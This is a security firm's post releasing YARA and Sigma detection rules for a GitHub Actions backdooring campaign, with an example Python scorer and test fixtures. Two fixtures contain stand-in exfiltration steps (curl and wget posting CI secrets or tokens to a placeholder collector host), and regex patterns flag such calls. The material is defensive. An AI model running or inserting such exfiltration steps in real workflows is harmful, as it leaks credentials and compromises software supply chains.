Megalodon Detection Rules — Free YARA and Sigma Rules for GitHub CI/CD Backdooring
Earlier this month, the security research team at SafeDep published findings on a campaign they named Megalodon — an automated supply-chain attack that injected malicious commits into 5,561 GitHub repositories over two days in May 2026. The attacker targeted GitHub Actions workflow files, replacing or modifying them to exfiltrate CI secrets: AWS credentials, GCP access tokens, SSH private keys, Docker configs, Kubernetes configs, and GitHub OIDC tokens. In at least one case, the attack propagated into a published npm package before being detected.
SafeDep's research documented the indicators of compromise and attack patterns in detail. What was missing was scanner coverage: no existing YARA or Sigma rule sets detected Megalodon variants. We built them.
What we've released
We are publishing a set of YARA and Sigma detection rules for the Megalodon campaign under the Apache 2.0 licence — free to use, adapt, and integrate into any security tooling.
The rule set includes:
- 7 YARA rules detecting Megalodon-variant CI workflow injection patterns, including secrets exfiltration via HTTP, OIDC token harvesting, credential file enumeration, and the use of encoded payloads
- 5 Sigma rules for the same patterns, with Splunk, Elasticsearch, and OpenSearch output via sigma-cli
- A Docker-based test harness with positive and negative fixture scoring, so reliability data is published alongside the rules rather than asserted without evidence
Test results
All 7 YARA rules compile cleanly. 15 of 16 YARA fixture tests pass. The one known false positive — workflows using id-token: write permissions for legitimate OIDC deployments — is documented and scored: 66.7% precision, 100% recall (F1 = 0.80). This is visible in the rule's meta block. A documented triage signal is more useful to defenders than a suppressed rule.
All 15 Sigma conversion tests pass.
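To show how fixture scoring of this kind produces the precision/recall/F1 figures quoted above, here is an added example (not the repository's code or its published rules): a deliberately coarse stand-in rule, four constructed workflow fixtures, and a scorer that reproduces the 66.7% / 100% / 0.80 outcome when one legitimate OIDC deployment is flagged. The rule patterns, fixture text and hostnames are all assumptions.

```python
import re

# Constructed stand-in for one rule's logic; this is an assumption, not the published
# YARA rule. It flags a GitHub Actions workflow that both requests the OIDC permission
# and runs a step calling out to a host other than github.com. Like the published rule,
# it is deliberately coarse: a legitimate OIDC deployment that also calls a webhook
# scores as a false positive, which is the triage signal the post describes.
OIDC_PERMISSION = re.compile(r"id-token:\s*write")
OUTBOUND_CALL = re.compile(r"\b(?:curl|wget)\b[^\n]*https?://(?!(?:api\.)?github\.com/)")

def rule_matches(workflow: str) -> bool:
    return bool(OIDC_PERMISSION.search(workflow) and OUTBOUND_CALL.search(workflow))

# Constructed fixtures (not the repository's): workflow text and whether it is malicious.
FIXTURES = {
    "positive_secret_exfil": (
        "permissions:\n  id-token: write\njobs:\n  build:\n    steps:\n"
        "      - run: curl -s -X POST -d \"$CI_SECRETS\" https://collector.example.invalid/up\n",
        True),
    "positive_token_post": (
        "permissions:\n  id-token: write\njobs:\n  build:\n    steps:\n"
        "      - run: wget -q --post-data \"$TOKEN\" https://collector.example.invalid/oidc\n",
        True),
    "negative_legit_oidc_deploy": (
        "permissions:\n  id-token: write\n  contents: read\njobs:\n  deploy:\n    steps:\n"
        "      - uses: aws-actions/configure-aws-credentials@v4\n"
        "      - run: aws s3 sync ./dist s3://example-bucket\n"
        "      - run: curl -fsS -X POST https://hooks.example.invalid/deploy-done\n",
        False),
    "negative_plain_ci": (
        "permissions:\n  contents: read\njobs:\n  test:\n    steps:\n"
        "      - uses: actions/checkout@v4\n      - run: npm ci && npm test\n",
        False),
}

def score(rule, fixtures) -> dict:
    """Score a rule against labelled fixtures: the precision/recall/F1 that a
    rule's meta block would carry, computed from counts rather than asserted."""
    tp = sum(1 for text, bad in fixtures.values() if bad and rule(text))
    fp = sum(1 for text, bad in fixtures.values() if not bad and rule(text))
    fn = sum(1 for text, bad in fixtures.values() if bad and not rule(text))
    precision = tp / (tp + fp) if tp + fp else 0.0
    recall = tp / (tp + fn) if tp + fn else 0.0
    f1 = 2 * precision * recall / (precision + recall) if precision + recall else 0.0
    return {"tp": tp, "fp": fp, "fn": fn,
            "precision": round(precision, 3), "recall": round(recall, 3), "f1": round(f1, 2)}

if __name__ == "__main__":
    print(score(rule_matches, FIXTURES))  # the legit deploy is the one false positive
```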
Where to get the rules
The detection rules are published at github.com/Spyced-Concepts/detection-rules. The repository is Apache 2.0 licensed. Pull the rules and use them directly, or import them into your SIEM via the sigma-cli output files in megalodon/test/sigma/results/.
Attribution
The IoC intelligence behind these rules comes from SafeDep's original Megalodon research. We have notified them prior to publication and credit their work prominently in the repository. The detection rule logic — patterns, fixture design, test harness, and reliability scoring — is original work by Spyced Concepts Ltd.
What's next
We intend to submit the rules to the Neo23x0/signature-base YARA community collection and to Elastic's detection-rules repository, and to write a SANS ISC diary entry for broader community awareness.
If you have found Megalodon indicators in your environment, or if you identify patterns we've missed, get in touch.